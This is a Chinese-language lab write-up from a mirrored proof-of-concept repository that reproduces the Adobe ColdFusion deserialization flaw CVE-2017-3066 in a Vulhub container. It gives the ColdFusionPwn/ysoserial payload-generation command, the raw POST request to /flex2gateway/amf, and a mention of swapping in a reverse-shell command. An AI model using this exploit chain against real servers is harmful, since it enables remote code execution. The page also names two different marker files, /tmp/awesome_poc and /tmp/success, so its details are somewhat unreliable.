admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/中间件漏洞/Adobe ColdFusion 反序列化漏洞 CVE-2017-3066.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

68 lines
2.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Adobe ColdFusion 反序列化漏洞 CVE-2017-3066
## 漏洞描述
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品其运行的CFMLColdFusion Markup Language是针对Web应用的一种程序设计语言。
Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响Adobe ColdFusion (2016 release) Update 3及之前的版本ColdFusion 11 Update 11及之前的版本ColdFusion 10 Update 22及之前的版本。
参考链接:
- https://codewhitesec.blogspot.com.au/2018/03/exploiting-adobe-coldfusion.html
- https://www.exploit-db.com/exploits/43993
- https://github.com/codewhitesec/ColdFusionPwn
## 环境搭建
Vulhub启动漏洞环境
```
docker-compose up -d
```
访问`http://your-ip:8500/CFIDE/administrator/index.cfm`,输入密码`vulhub`即可成功安装Adobe ColdFusion。
## 漏洞复现
使用参考链接中的[ColdFusionPwn](https://github.com/codewhitesec/ColdFusionPwn)工具来生成POC
```
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/awesome_poc' poc.ser
```
POC生成于poc.ser文件中将POC作为数据包body发送给`http://your-ip:8500/flex2gateway/amf`Content-Type为application/x-amf。
将POC作为数据包bodyBurpsuite右键→Paste From File→选择poc.ser
```
POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853
[...poc...]
```
**至此复现不成功上传poc.ser之后POST/tmp/awesome_poc文件没有创建完成**
**补充与burpsuite版本有关老版本的burpsuite可以复现成功**
**Burpsuite+Postman联动复现也不成功。操作步骤可参考https://mp.weixin.qq.com/s/-6U2dOJs930kMYv7z-NUgg**
------
![](images/202202212052978.png)
进入容器中,发现`/tmp/success`已成功创建:
![](images/202202212053950.png)
将POC改成[反弹命令](https://www.bugku.net/runtime-exec-payloads/)成功拿到shell
![](images/202202212053074.png)
Reference in New Issue View Git Blame Copy Permalink